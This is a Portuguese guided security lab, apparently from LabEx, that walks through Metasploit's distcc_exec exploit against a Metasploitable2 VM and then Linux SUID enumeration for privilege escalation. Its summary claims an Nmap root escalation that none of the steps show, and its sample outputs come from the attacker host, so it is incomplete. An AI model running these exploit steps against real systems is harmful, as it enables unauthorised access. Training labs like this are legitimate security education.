Realizar Escalada de Privilégios em Máquina Linux com Nmap

NmapBeginner
Pratique Agora

Introdução

Neste laboratório, você aprenderá como realizar a escalada de privilégios em uma máquina Linux após obter acesso com sucesso como um usuário não-root. Embora existam muitos tutoriais disponíveis online para a escalada de privilégios no Windows, este laboratório se concentra especificamente na escalada de privilégios em um sistema operacional Linux.

Este é um Lab Guiado, que fornece instruções passo a passo para ajudá-lo a aprender e praticar. Siga as instruções cuidadosamente para completar cada etapa e ganhar experiência prática. Dados históricos mostram que este é um laboratório de nível iniciante com uma taxa de conclusão de 100%. Recebeu uma taxa de avaliações positivas de 95% dos estudantes.

Preparar o Ambiente

Nesta etapa, iniciaremos os componentes necessários do ambiente do laboratório, incluindo o contêiner Kali Linux e a máquina virtual Metasploitable2.

  1. Inicie a máquina virtual Metasploitable2 executando o seguinte comando no terminal:
sudo virsh start Metasploitable2

Aguarde o início da máquina alvo, o que pode levar de 1 a 3 minutos.

  1. Teste se a máquina virtual foi iniciada fazendo ping no nome de host target:
ping 192.168.122.102

Pressione Ctrl+C para parar o ping.

  1. Inicie o contêiner Kali Linux e entre em seu shell bash:
docker run -ti --network host b5b709a49cd5 bash
  1. Dentro do contêiner Kali, teste a conectividade de rede fazendo ping no nome de host target:
ping 192.168.122.102

Pressione Ctrl+C para parar o ping.

Obter Acesso Inicial à Máquina Alvo

Nesta etapa, usaremos o Metasploit Framework (MSF) no contêiner Kali para obter acesso inicial à máquina alvo Metasploitable2.

  1. Dentro do contêiner Kali, inicie o console Metasploit:
cd ~
msfconsole
  1. Dentro do console Metasploit, use o módulo de exploit distcc_exec:
use exploit/unix/misc/distcc_exec
  1. Defina o endereço IP do host alvo:
set RHOST 192.168.122.102
  1. Lance o exploit para obter acesso à máquina alvo:
exploit

Após uma exploração bem-sucedida, você deverá ver uma sessão de shell de comando aberta, indicando que você obteve acesso à máquina alvo.

Pressione Ctrl+D para sair do console Metasploit e, em seguida, iniciar a inspeção

Verificar Privilégios do Usuário Atual

Após obter o acesso inicial, precisamos verificar os privilégios do usuário atual para determinar se é necessária uma escalada de privilégios adicional.

  1. Antes de mais nada, se você não estiver no console Metasploit, deverá iniciar o console Metasploit:
cd ~
msfconsole
  1. Verifique o usuário atual:
whoami
  1. Verifique o ID do usuário e as informações do grupo:
id

Se o ID do usuário não for 0 (root), você precisará escalar os privilégios para obter acesso administrativo.

Pressione Ctrl+D para sair do console Metasploit e, em seguida, iniciar a inspeção

Enumerar Informações do Sistema

Antes de tentar a escalada de privilégios, precisamos coletar informações sobre o sistema alvo para identificar potenciais vulnerabilidades.

  1. Antes de mais nada, se você não estiver no console Metasploit, deverá iniciar o console Metasploit:
cd ~
msfconsole
  1. Verifique a versão da distribuição Linux:
lsb_release -a

Aqui está um exemplo da saída que você pode ver:

[*] exec: lsb_release -a

No LSB modules are available.
Distributor ID: Kali
Description:    Kali GNU/Linux Rolling
Release:        2023.2
Codename:       kali-rolling
  1. Verifique a versão do kernel:
uname -a

Aqui está um exemplo da saída que você pode ver:

Linux iZj6ceecakbzgu9eomquhhZ 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64 GNU/Linux
  1. Encontre arquivos SUID que poderiam ser potencialmente explorados para escalada de privilégios:
find / -perm -u=s -type f 2> /dev/null

Na saída, você deve ver o binário /usr/bin/nmap, que possui uma vulnerabilidade de escalada de privilégios conhecida em versões mais antigas, pressione Ctrl+C para sair.

Pressione Ctrl+D para sair do console Metasploit e, em seguida, iniciar a inspeção

Resumo

Neste laboratório, você aprendeu como realizar a escalada de privilégios em uma máquina Linux após obter o acesso inicial como um usuário não-root. Começamos configurando o ambiente LabEx com o contêiner Kali Linux e a máquina virtual Metasploitable2. Em seguida, usamos o Metasploit Framework para explorar a vulnerabilidade Distcc e obter acesso inicial à máquina alvo.

Após verificar que não éramos um usuário root, reunimos informações sobre o sistema alvo, como a versão da distribuição Linux, a versão do kernel e os arquivos SUID. Identificamos o binário Nmap como uma potencial vulnerabilidade e o exploramos para escalar nossos privilégios para root.

Ao concluir este laboratório, você adquiriu experiência prática com o processo de escalada de privilégios em sistemas Linux, que é uma habilidade crítica no campo da segurança cibernética. Você também aprendeu como usar vários comandos Linux para enumeração e exploração do sistema, bem como como aproveitar as vulnerabilidades em software para obter acesso elevado.